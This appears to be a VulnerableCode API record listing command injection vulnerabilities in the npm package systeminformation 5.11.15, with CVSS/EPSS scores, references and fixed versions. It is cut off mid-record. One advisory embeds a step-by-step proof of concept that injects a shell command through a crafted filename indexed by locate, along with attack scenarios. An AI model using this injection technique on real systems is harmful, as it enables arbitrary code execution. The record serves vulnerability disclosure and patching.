Look up vulnerable packages by Package URL.
GET /api/packages/677734?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/677734?format=api", "purl": "pkg:npm/systeminformation@5.11.15", "type": "npm", "namespace": "", "name": "systeminformation", "version": "5.11.15", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "5.31.0", "latest_non_vulnerable_version": "5.31.6", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50225?format=api", "vulnerability_id": "VCID-2rnv-d3tb-hug9", "summary": "Systeminformation has a Command Injection via unsanitized interface parameter in wifi.js retry path\nA command injection vulnerability in the `wifiNetworks()` function allows an attacker to execute arbitrary OS commands via an unsanitized network interface parameter in the retry code path.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26280.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.4", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26280.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-26280", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0003", "scoring_system": "epss", "scoring_elements": "0.09016", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-26280" }, { "reference_url": "https://github.com/sebhildebrandt/systeminformation", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/sebhildebrandt/systeminformation" }, { "reference_url": 
"https://github.com/sebhildebrandt/systeminformation/commit/22242aa56188f2bffcbd7d265a11e1ebb808b460", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-19T20:57:36Z/" } ], "url": "https://github.com/sebhildebrandt/systeminformation/commit/22242aa56188f2bffcbd7d265a11e1ebb808b460" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441121", "reference_id": "2441121", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441121" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26280", "reference_id": "CVE-2026-26280", "reference_type": "", "scores": [ { "value": "8.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26280" }, { "reference_url": "https://github.com/advisories/GHSA-9c88-49p5-5ggf", "reference_id": "GHSA-9c88-49p5-5ggf", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9c88-49p5-5ggf" }, { "reference_url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-9c88-49p5-5ggf", "reference_id": "GHSA-9c88-49p5-5ggf", "reference_type": "", "scores": [ { "value": "8.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", 
"scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-19T20:57:36Z/" } ], "url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-9c88-49p5-5ggf" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/74120?format=api", "purl": "pkg:npm/systeminformation@5.30.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-kg9c-n3a4-9uh1" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/systeminformation@5.30.8" } ], "aliases": [ "CVE-2026-26280", "GHSA-9c88-49p5-5ggf" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2rnv-d3tb-hug9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/46072?format=api", "vulnerability_id": "VCID-3vuy-w9kw-7fdy", "summary": "systeminformation SSID Command Injection Vulnerability\n### Impact\nSSID Command Injection Vulnerability\n\n### Patches\nProblem was fixed with a parameter check. 
Please upgrade to version >= 5.21.7, Version 4 was not affected\n\n### Workarounds\nIf you cannot upgrade, be sure to check or sanitize parameter strings that are passed to wifiConnections(), wifiNetworks() (string only)\n\n### References\nSee also https://systeminformation.io/security.html", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-42810", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.02061", "scoring_system": "epss", "scoring_elements": "0.8425", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-42810" }, { "reference_url": "https://github.com/sebhildebrandt/systeminformation", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/sebhildebrandt/systeminformation" }, { "reference_url": "https://github.com/sebhildebrandt/systeminformation/commit/7972565812ccb2a610a22911c54c3446f4171392", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-09-24T14:49:28Z/" } ], "url": "https://github.com/sebhildebrandt/systeminformation/commit/7972565812ccb2a610a22911c54c3446f4171392" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-42810", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": 
"https://nvd.nist.gov/vuln/detail/CVE-2023-42810" }, { "reference_url": "https://systeminformation.io/security.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-09-24T14:49:28Z/" } ], "url": "https://systeminformation.io/security.html" }, { "reference_url": "https://github.com/advisories/GHSA-gx6r-qc2v-3p3v", "reference_id": "GHSA-gx6r-qc2v-3p3v", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-gx6r-qc2v-3p3v" }, { "reference_url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-gx6r-qc2v-3p3v", "reference_id": "GHSA-gx6r-qc2v-3p3v", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-09-24T14:49:28Z/" } ], "url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-gx6r-qc2v-3p3v" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/67079?format=api", "purl": "pkg:npm/systeminformation@5.21.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2rnv-d3tb-hug9" }, { "vulnerability": "VCID-99un-1enx-5uhv" }, { "vulnerability": "VCID-kg9c-n3a4-9uh1" }, { "vulnerability": "VCID-wd8e-yyex-vqff" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/systeminformation@5.21.7" } ], "aliases": [ "CVE-2023-42810", "GHSA-gx6r-qc2v-3p3v" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", 
"resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3vuy-w9kw-7fdy" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/56379?format=api", "vulnerability_id": "VCID-99un-1enx-5uhv", "summary": "Systeminformation has command injection vulnerability in getWindowsIEEE8021x (SSID)\nThe SSID is not sanitized before it is passed as a parameter to cmd.exe in the `getWindowsIEEE8021x` function. This means that malicious content in the SSID can be executed as OS commands.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-56334.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.0", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-56334.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-56334", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.04955", "scoring_system": "epss", "scoring_elements": "0.8985", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-56334" }, { "reference_url": "https://github.com/sebhildebrandt/systeminformation", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/sebhildebrandt/systeminformation" }, { "reference_url": "https://github.com/sebhildebrandt/systeminformation/commit/f7af0a67b78e7894335a6cad510566a25e06ae41", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", 
"scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-24T16:32:16Z/" } ], "url": "https://github.com/sebhildebrandt/systeminformation/commit/f7af0a67b78e7894335a6cad510566a25e06ae41" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2333587", "reference_id": "2333587", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2333587" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56334", "reference_id": "CVE-2024-56334", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56334" }, { "reference_url": "https://github.com/advisories/GHSA-cvv5-9h9w-qp2m", "reference_id": "GHSA-cvv5-9h9w-qp2m", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-cvv5-9h9w-qp2m" }, { "reference_url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-cvv5-9h9w-qp2m", "reference_id": "GHSA-cvv5-9h9w-qp2m", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-24T16:32:16Z/" } ], "url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-cvv5-9h9w-qp2m" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:3374", "reference_id": "RHSA-2025:3374", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:3374" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/83606?format=api", "purl": "pkg:npm/systeminformation@5.23.7", 
"is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/systeminformation@5.23.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/791994?format=api", "purl": "pkg:npm/systeminformation@5.23.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2rnv-d3tb-hug9" }, { "vulnerability": "VCID-kg9c-n3a4-9uh1" }, { "vulnerability": "VCID-wd8e-yyex-vqff" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/systeminformation@5.23.8" } ], "aliases": [ "CVE-2024-56334", "GHSA-cvv5-9h9w-qp2m" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-99un-1enx-5uhv" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50231?format=api", "vulnerability_id": "VCID-kg9c-n3a4-9uh1", "summary": "# Command Injection via Unsanitized `locate` Output in `versions()` — systeminformation\n\n**Package:** systeminformation (npm) \n**Tested Version:** 5.30.7 \n**Affected Platform:** Linux \n**Author:** Sebastian Hildebrandt \n**Weekly Downloads:** ~5,000,000+ \n**Repository:** https://github.com/sebhildebrandt/systeminformation \n**Severity:** Medium \n**CWE:** CWE-78 (OS Command Injection) \n\n---\n\n### The Vulnerable Code Path\n\nInside the `versions()` function, when detecting the PostgreSQL version on Linux, the code does this:\n\n```javascript\n// lib/osinfo.js — lines 770-776\n\nexec('locate bin/postgres', (error, stdout) => {\n if (!error) {\n const postgresqlBin = stdout.toString().split('\\n').sort();\n if (postgresqlBin.length) {\n exec(postgresqlBin[postgresqlBin.length - 1] + ' -V', (error, stdout) => {\n // parses version string...\n });\n }\n }\n});\n```\n\nHere's what happens step by step:\n\n1. It runs `locate bin/postgres` to search the filesystem for PostgreSQL binaries\n2. It splits the output by newline and sorts the results alphabetically\n3. 
It takes the **last element** (highest alphabetically)\n4. It concatenates that path directly into a new `exec()` call with `+ ' -V'`\n\n**No `sanitizeShellString()`. No path validation. No `execFile()`. Raw string concatenation into `exec()`.**\n\nThe `locate` command reads from a system-wide database (`plocate.db` or `mlocate.db`) that indexes all filenames on the system. If any indexed filename contains shell metacharacters — specifically semicolons — those characters will be interpreted by the shell when passed to `exec()`.\n\n---\n\n## Exploitation\n\n### Prerequisites\n\nFor this vulnerability to be exploitable, the following conditions must be met:\n\n1. **Target system runs Linux** — the vulnerable code path is inside an `if (_linux)` block\n2. **`locate` / `plocate` is installed** — common on Ubuntu, Debian, Fedora, RHEL\n3. **PostgreSQL binary exists in the locate database** — so `locate bin/postgres` returns results (otherwise the code falls through to a safe `psql -V` fallback)\n4. **The attacker can create files on the filesystem** — in any directory that gets indexed by `updatedb`\n5. **The locate database gets updated** — `updatedb` runs daily via systemd timer (`plocate-updatedb.timer`) or cron on most distros\n\n### Step 1 — Verify the Environment\n\nOn the target machine, confirm locate is available and running:\n\n```\nwhich locate\n# /usr/bin/locate\n\nsystemctl list-timers | grep plocate\n# plocate-updatedb.timer plocate-updatedb.service\n# (runs daily, typically around 1-2 AM)\n```\n\nCheck who owns the locate database:\n\n```\nls -la /var/lib/plocate/plocate.db\n# -rw-r----- 1 root plocate 18851616 Feb 14 01:50 /var/lib/plocate/plocate.db\n```\n\nDatabase is root-owned and updated by root. 
Regular users cannot update it directly, but `updatedb` runs on a daily schedule and indexes all readable files.\n\n### Step 2 — Craft the Malicious File Path\n\nThe key insight is that **Linux allows semicolons in filenames**, and `exec()` passes strings through `/bin/sh -c` which **interprets semicolons as command separators**.\n\nCreate a file whose path contains an injected command:\n\n```\nmkdir -p \"/var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin\"\ntouch \"/var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres\"\n```\n\nVerify it exists:\n\n```\nfind /var/tmp -name postgres\n# /var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres\n```\n\nThis file needs to end up in the `locate` database. On a real system, this happens automatically when `updatedb` runs overnight. For testing purposes:\n\n```\nsudo updatedb\n```\n\nThen verify locate picks it up:\n\n```\nlocate bin/postgres\n# /usr/lib/postgresql/14/bin/postgres\n# /var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres\n```\n\n### Step 3 — Understand the Sort Trick\n\nThe vulnerable code sorts the locate results alphabetically and takes the **last** element:\n\n```javascript\nconst postgresqlBin = stdout.toString().split('\\n').sort();\nexec(postgresqlBin[postgresqlBin.length - 1] + ' -V', ...);\n```\n\nAlphabetically, `/var/` sorts **after** `/usr/`. 
So our malicious path naturally becomes the selected one:\n\n```\nNode.js sort order:\n [0] /usr/lib/postgresql/14/bin/postgres ← legitimate\n [1] /var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres ← selected (last)\n```\n\nQuick verification:\n\n```\nnode -e \"\nconst paths = [\n '/usr/lib/postgresql/14/bin/postgres',\n '/var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres'\n];\nconsole.log('Sorted:', paths.sort());\nconsole.log('Selected (last):', paths[paths.length - 1]);\n\"\n```\n\nOutput:\n\n```\nSorted: [\n '/usr/lib/postgresql/14/bin/postgres',\n '/var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres'\n]\nSelected (last): /var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres\n```\n\n### Step 4 — Trigger the Vulnerability\n\nNow when any application using systeminformation calls `versions()` requesting the postgresql version, the injected command fires:\n\n```javascript\nconst si = require('systeminformation');\n\n// This is a normal, innocent API call\nsi.versions('postgresql').then(data => {\n console.log(data);\n});\n```\n\nInternally, the library builds and executes this command:\n\n```\n/var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres -V\n```\n\nThe shell (`/bin/sh -c`) interprets this as three separate commands:\n\n```\n/var/tmp/x → fails silently (not executable)\ntouch /tmp/SI_RCE_PROOF → ATTACKER'S COMMAND EXECUTES\n/bin/postgres -V → runs normally, returns version\n```\n\n### Step 5 — Verify Code Execution\n\n```\nls -la /tmp/SI_RCE_PROOF\n# -rw-rw-r-- 1 appuser appuser 0 Feb 14 15:30 /tmp/SI_RCE_PROOF\n```\n\nThe file exists. Arbitrary command execution confirmed.\n\nThe injected command runs with **whatever privileges the Node.js process has**. In a monitoring dashboard or backend API context, that's typically the application service account.\n\n---\n\n## Real-World Attack Scenarios\n\n### Scenario 1 — Shared Hosting / Multi-Tenant Server\n\nA low-privileged user on a shared server creates the malicious file in `/tmp` or their home directory. 
The hosting provider runs a monitoring agent that uses `systeminformation` for health dashboards. Next time the agent calls `versions()`, the attacker's command executes under the monitoring agent's (higher-privileged) service account.\n\n### Scenario 2 — CI/CD Pipeline Poisoning\n\nA malicious contributor submits a PR that includes a build step creating files with crafted names. If the CI pipeline uses `systeminformation` for environment reporting (common in test harnesses and build dashboards), the injected commands execute in the CI runner context — potentially leaking secrets, tokens, and deployment keys.\n\n### Scenario 3 — Container / Kubernetes Escape\n\nIn containerized environments where `/var` or `/tmp` sits on a shared volume, a compromised container creates the malicious file. When the host-level monitoring agent (running `systeminformation`) calls `versions()`, the injected command executes on the host, breaking out of the container boundary.\n\n---\n\n## Suggested Fix\n\nReplace `exec()` with `execFile()` for the PostgreSQL binary version check. `execFile()` does not spawn a shell, so metacharacters in the path are treated as literal characters:\n\n```javascript\nconst { execFile } = require('child_process');\n\nexec('locate bin/postgres', (error, stdout) => {\n if (!error) {\n const postgresqlBin = stdout.toString().split('\\n')\n .filter(p => p.trim().length > 0)\n .sort();\n if (postgresqlBin.length) {\n execFile(postgresqlBin[postgresqlBin.length - 1], ['-V'], (error, stdout) => {\n // ... 
parse version\n });\n }\n }\n});\n```\n\nAdditionally, the locate output should be validated against a safe path pattern before use:\n\n```javascript\nconst safePath = /^[a-zA-Z0-9/_.-]+$/;\nconst postgresqlBin = stdout.toString().split('\\n')\n .filter(p => safePath.test(p.trim()))\n .sort();\n```\n\n---\n\n## Disclosure\n\n- **Reported via:** GitHub Private Security Advisory\n- **Advisory URL:** https://github.com/sebhildebrandt/systeminformation/security/advisories/new\n- **Security Contact:** security@systeminformation.io", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26318.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26318.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-26318", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05795", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-26318" }, { "reference_url": "https://github.com/sebhildebrandt/systeminformation", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/sebhildebrandt/systeminformation" }, { "reference_url": "https://github.com/sebhildebrandt/systeminformation/commit/b67d3715eec881038ccbaace2f2711419ac3e107", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { 
"value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-19T20:57:34Z/" } ], "url": "https://github.com/sebhildebrandt/systeminformation/commit/b67d3715eec881038ccbaace2f2711419ac3e107" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441124", "reference_id": "2441124", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441124" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26318", "reference_id": "CVE-2026-26318", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26318" }, { "reference_url": "https://github.com/advisories/GHSA-5vv4-hvf7-2h46", "reference_id": "GHSA-5vv4-hvf7-2h46", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5vv4-hvf7-2h46" }, { "reference_url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-5vv4-hvf7-2h46", "reference_id": "GHSA-5vv4-hvf7-2h46", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-19T20:57:34Z/" } ], "url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-5vv4-hvf7-2h46" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/74123?format=api", "purl": "pkg:npm/systeminformation@5.31.0", "is_vulnerable": false, 
"affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/systeminformation@5.31.0" } ], "aliases": [ "CVE-2026-26318", "GHSA-5vv4-hvf7-2h46" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-kg9c-n3a4-9uh1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49455?format=api", "vulnerability_id": "VCID-wd8e-yyex-vqff", "summary": "systeminformation has a Command Injection vulnerability in fsSize() function on Windows\nThe `fsSize()` function in `systeminformation` is vulnerable to **OS Command Injection (CWE-78)** on Windows systems. The optional `drive` parameter is directly concatenated into a PowerShell command without sanitization, allowing arbitrary command execution when user-controlled input reaches this function.\n\n**Affected Platforms:** Windows only\n\n**CVSS Breakdown:**\n- **Attack Vector (AV:N):** Network - if used in a web application/API\n- **Attack Complexity (AC:H):** High - requires application to pass user input to `fsSize()`\n- **Privileges Required (PR:N):** None - no authentication required at library level\n- **User Interaction (UI:N):** None\n- **Scope (S:U):** Unchanged - executes within Node.js process context\n- **Confidentiality/Integrity/Availability (C:H/I:H/A:H):** High impact if exploited\n\n> **Note:** The actual exploitability depends on how applications use this function. 
If an application does not pass user-controlled input to `fsSize()`, it is not vulnerable.\n\n---", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-68154.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-68154.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68154", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00048", "scoring_system": "epss", "scoring_elements": "0.15424", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68154" }, { "reference_url": "https://github.com/sebhildebrandt/systeminformation", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/sebhildebrandt/systeminformation" }, { "reference_url": "https://github.com/sebhildebrandt/systeminformation/commit/c52f9fd07fef42d2d8e8c66f75b42178da701c68", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-12-17T14:50:36Z/" } ], "url": "https://github.com/sebhildebrandt/systeminformation/commit/c52f9fd07fef42d2d8e8c66f75b42178da701c68" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2422883", "reference_id": "2422883", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2422883" 
}, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68154", "reference_id": "CVE-2025-68154", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68154" }, { "reference_url": "https://github.com/advisories/GHSA-wphj-fx3q-84ch", "reference_id": "GHSA-wphj-fx3q-84ch", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-wphj-fx3q-84ch" }, { "reference_url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-wphj-fx3q-84ch", "reference_id": "GHSA-wphj-fx3q-84ch", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-12-17T14:50:36Z/" } ], "url": 